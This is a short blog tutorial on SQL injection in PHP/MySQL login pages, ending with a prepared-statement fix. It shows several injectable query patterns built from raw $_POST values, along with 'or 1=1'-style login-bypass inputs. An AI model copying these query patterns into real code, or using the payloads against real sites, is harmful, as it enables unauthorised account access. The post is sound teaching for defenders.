This is the blog to share your views, ideas and opinions with different types of people, on our politics, media, movies and each and every thing....

Don't forget to comment!

SQL injection in PHP and MySQL

Nowadays we create dynamic websites using PHP and MySQL because of less cost and more safety.
Every dynamic website has a login page, and here we have a small problem:
people who have some knowledge of programming can play small tricks
in order to log in to your account.
I'm going to explain with examples.
Suppose the query in the backend is built as shown below. Under each PHP line is the SQL that actually runs, followed by the username and password values typed into the form to produce it.

$qw="select * from tbl_admin where user_name=$_POST[username] and upassword=$_POST[password]";

select * from tbl_admin where user_name="" or "1"="1" and upassword="" or "1"="1"

username :  "" or "1"="1"
password :  "" or "1"="1"

-----------------------------------------------------------------------------------
$qw="select * from tbl_admin where user_name='$_POST[username]' and upassword='$_POST[password]'";

select * from tbl_admin where user_name='' or "1"='1' and upassword='' or "1"='1'

username :  ' or "1"='1
password : ' or "1"='1
-----------------------------------------------------------------------------------
$qw='select * from tbl_admin where user_name="'.$_POST['username'].'" and upassword="'.$_POST['password'].'"';

select * from tbl_admin where user_name="" OR ""="" and upassword="" OR ""=""

username :  " OR ""="
password :  " OR ""="

select * from tbl_admin where user_name="" or "1"="1" and upassword="" or "1"="1"

username :  " or "1"="1
password :  " or "1"="1
------------------------------------------------------------------------------------------

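In each case the quotes typed into the form become part of the SQL, and the final or condition is always true, so the query returns a row without a valid username or password.

In order to avoid this, we must write the query in a good fashion...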
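One way to write the login query safely, as an added example that is not part of the original post: a prepared statement binds the username as data, and the stored password is a hash checked with password_verify(). The in-memory SQLite database, the sample account and the check_login() helper name are assumptions made so the script runs offline; it feeds the post's own form values to the check.

```php
<?php
// Added example. Assumption: an in-memory SQLite database (pdo_sqlite) stands in
// for MySQL so the script runs offline; with MySQL only the PDO DSN changes.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE tbl_admin (user_name TEXT PRIMARY KEY, upassword TEXT NOT NULL)');

// Constructed sample account. upassword stores a password_hash() digest.
$ins = $pdo->prepare('INSERT INTO tbl_admin (user_name, upassword) VALUES (?, ?)');
$ins->execute(['admin', password_hash('S3cret-sample', PASSWORD_DEFAULT)]);

// check_login() is a hypothetical helper name, not from the original post.
function check_login(PDO $pdo, $username, $password): bool
{
    // Form fields can arrive as arrays (username[]=x); accept strings only.
    if (!is_string($username) || !is_string($password)) {
        return false;
    }
    // The ? placeholder keeps the value out of the SQL text, so quotes typed
    // into the form are compared as data and cannot alter the WHERE clause.
    $stmt = $pdo->prepare('SELECT upassword FROM tbl_admin WHERE user_name = ?');
    $stmt->execute([$username]);
    $hash = $stmt->fetchColumn();
    // No row means unknown user; otherwise compare against the stored hash.
    return is_string($hash) && password_verify($password, $hash);
}

// The username/password values shown in the post, plus one valid login.
$attempts = [
    ['"" or "1"="1"', '"" or "1"="1"'],
    ['\' or "1"=\'1', '\' or "1"=\'1'],
    ['" OR ""="', '" OR ""="'],
    ['" or "1"="1', '" or "1"="1'],
    ['admin', 'S3cret-sample'],
];
foreach ($attempts as [$user, $pass]) {
    $result = check_login($pdo, $user, $pass) ? 'login accepted' : 'login rejected';
    printf("%-16s => %s\n", $user, $result);
}
```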
